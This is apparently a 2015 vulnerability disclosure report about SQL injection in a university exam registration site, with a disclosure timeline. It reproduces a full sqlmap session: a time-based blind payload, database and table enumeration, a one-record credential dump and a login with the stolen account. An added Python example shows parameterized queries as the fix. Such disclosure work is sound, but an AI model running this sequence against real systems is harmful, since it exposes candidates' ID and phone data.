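2015-09-22: Details reported to the vendor; awaiting vendor response
2015-09-23: Vendor confirmed; details disclosed to the vendor only
2015-10-03: Details disclosed to core white hats and relevant domain experts
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public

National Computer Proficiency Examination for Professional and Technical Personnel: the registration system of the Chang'an University test center leaks the sensitive information of 20,000+ candidates (including ID card numbers and mobile phone numbers).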
http://**.**.**.**:8080/bmxt/
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --batch
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150919}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**

Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=123456' AND (SELECT * FROM (SELECT(SLEEP(5)))jRnE) AND 'gUcO'='gUcO&password=123456&Submit=%B5%C7%C2%BC
---
[23:43:51] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --dbs --batch
available databases [5]:
[*] bmxt
[*] information_scheqa
[*] mysql
[*] performance_schema
[*] tqst

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt --tables --batch
Database: bmxt
[9 tables]
+----------+
| user     |
| ad       |
| admin    |
| class    |
| discuss  |
| e1       |
| examtime |
| zheqgce  |
| ziliao   |
+----------+

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt -T admin --columns --batch
Database: bmxt
Table: admin
[10 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| adminname       | varchar(20) |
| fqe_manage      |             |
| gonggao_manage  | varchar(5)  |
| id              | int(11)     |
| mqssage_manage  |             |
| password        | varchar(20) |
| stu_date_mqnage |             |
| stu_manage      | varchar(5)  |
| sys_manage      | varchar(5)  |
| user_manage     | varchar(5)  |
+-----------------+-------------+

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?methd=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmx -T user --columns --batch
Database: bmxt
Table: user
[33 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| a1          | varchar(50) |
| a2          | varchar(50) |
| a3          | varchar(50) |
| a4          | varchar(50) |
| a5          | varchar(50) |
| a6          | varchar(50) |
| a7          | varchar(50) |
| address     | varchar(50) |
| admin       | varchar(50) |
| b1          | varchar(50) |
| b2          | varchar(50) |
| b3          | varchar(50) |
| b4          | varchar(50) |
| b5          | varchar(50) |
| b6          | varchar(50) |
| b7          | varchar(50) |
| baddress    | varchar(50) |
| bk          | varchar(50) |
| checkfee    | int(11)     |
| degree      | varchar(50) |
| del         | int(11)     |
| dnum        | varchar(50) |
| email       | varchar(50) |
| examDate    | varchar(50) |
| id          | int(11)     |
| identify_id | varchar(50) |
| password    | varchar(50) |
| picname     | varchar(50) |
| postcode    | varchar(50) |
| telphone    | varchar(50) |
| truename    | varchar(50) |
| username    | varchar(50) |
| yes         | int(1)      |
+-------------+-------------+

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --count -D bmxt -T user –C "username,password"--batch
[12:31:58] [INFO] resumed: 22171
Database: bmxt
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 22171   |
+--------+---------+
There is too much data, so I dumped only one record to take a look.

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt -T user –C "username,password" --stop 1 --dump --batch

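Got an account and password; let's try them.
Logged in successfully. The information is extensive; if exploited, this would be very dangerous.
I hope Chang'an University fixes this as soon as possible and takes responsibility for the candidates.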
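
The report does not show the server-side code, so the following is an added illustration of the fix, not code from the report or the affected system: it runs the username payload from the sqlmap output against a concatenated login query and against a parameterized one. Assumptions: Python's sqlite3 stands in for the JSP/MySQL back end, `login_vulnerable` is a hypothetical reconstruction of the flaw, the table row is constructed test data, and SLEEP() is replaced by a stub that records calls instead of delaying.

```python
import sqlite3

# Value of the username field in the sqlmap payload shown in the report.
PAYLOAD = "123456' AND (SELECT * FROM (SELECT(SLEEP(5)))jRnE) AND 'gUcO'='gUcO"


def make_db():
    """In-memory stand-in for bmxt.user; the single row is constructed test data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO user (username, password) VALUES ('123456', '123456')")
    sleep_calls = []
    # SQLite has no SLEEP(); this stub records the argument instead of delaying
    # and returns 0, as MySQL's SLEEP() does when it completes.
    conn.create_function("SLEEP", 1, lambda secs: sleep_calls.append(secs) or 0)
    return conn, sleep_calls


def login_vulnerable(conn, username, password):
    """Hypothetical flaw: request values concatenated into the SQL text."""
    sql = ("SELECT id FROM user WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Bound parameters: values reach the database as data, never as SQL."""
    sql = "SELECT id FROM user WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def compare():
    """Return how many times SLEEP() ran for each login variant."""
    conn, sleep_calls = make_db()
    login_safe(conn, PAYLOAD, "123456")
    safe_calls = len(sleep_calls)
    login_vulnerable(conn, PAYLOAD, "123456")
    return {"safe": safe_calls, "vulnerable": len(sleep_calls) - safe_calls}


if __name__ == "__main__":
    print(compare())
```

In the JSP/JDBC stack the report identifies, the equivalent of `login_safe` is a `PreparedStatement` with `?` placeholders.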
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-09-23 08:26
Notifying the user to handle it
None at this time